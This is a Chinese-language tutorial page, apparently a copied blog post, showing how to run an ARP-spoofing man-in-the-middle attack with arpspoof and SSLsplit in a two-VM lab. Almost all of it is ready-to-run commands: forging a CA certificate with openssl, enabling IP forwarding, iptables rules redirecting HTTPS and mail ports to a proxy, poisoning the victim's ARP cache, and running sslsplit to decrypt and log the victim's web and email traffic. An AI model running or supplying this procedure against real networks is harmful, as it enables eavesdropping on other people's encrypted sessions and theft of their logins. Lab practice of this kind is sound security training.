您好,欢迎来到化拓教育网。
搜索
您的当前位置:首页利用SSLsplit+arpspoof 实现ARP欺骗

利用SSLsplit+arpspoof 实现ARP欺骗

来源:化拓教育网

参考博客:

准备

一台win7虚拟机,IP:192.168.88.130   默认网关:192.168.88.2

一台kali虚拟机,IP:192.168.88.129

SSLsplit 是一个针对 SSL/TLS 加密的网络连接进行攻击,为网络取证和渗透测试的工具。它会终止 SSL / TLS 和启动一个新的连接到原来的目的地,记录所有传输的数据。它支持普通的 TCP 和 SSL,HTTP 和 HTTPS,和 IPv4 和 IPv6。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。

1、利用openssl生成证书私钥

openssl genrsa -out ca.key 2048

 2、利用私钥签名生成证书

openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

 

3、开启路由转发功能

sysctl -w net.ipv4.ip_forward=1

4、设置iptables端口转发规则

1、清空当前表规则:iptables -t nat -F  

2、设置iptables端口转发规则:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 【#HTTP】
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 【#HTTPS】
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 【#MSA】
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 【#SMTPS】
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 【#IMAPS】
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 【#POP3S】

(-t:指定表;-A PERROUTING:路由前生效;-p:指定协议;–dport:接受流量的端口;-j:指定处理方法(REDIRECT重定向);–to-ports:转发端口)

3、使用该命令显示所有刚才配置的规则:iptables -t nat -L

 5、 Arp欺骗 ,截获目标主机的网络流量

arpspoof -i eth0 -t 目标IP -r 目标主机网关
arpspoof -i eth0 -t 192.168.88.130 -r 192.168.88.2

6、启动SSLsplit进行攻击 

1、创建目录
mkdir -p test/logdir

2、侦听设定的端口
sslsplit -D -l connect.log -j /root/test -S /root/test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

伪造成功后,目标机访问https的网站,会出现“安全证书有问题的错误”,点击继续访问后,访问信息被记录在connect.log中,且在test/logdir可查看传输数据

 

 

下面这个是看别人视频看的

1、查找同一局域网下存活的IP

 2、下面这条命令是告诉192.168.88.130这个IP kali才是网关

 已经访问不上百度了

 

 

因篇幅问题不能全部显示,请点此查看更多更全内容

Copyright © 2019- huatuo9.cn 版权所有 赣ICP备2023008801号-1

违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务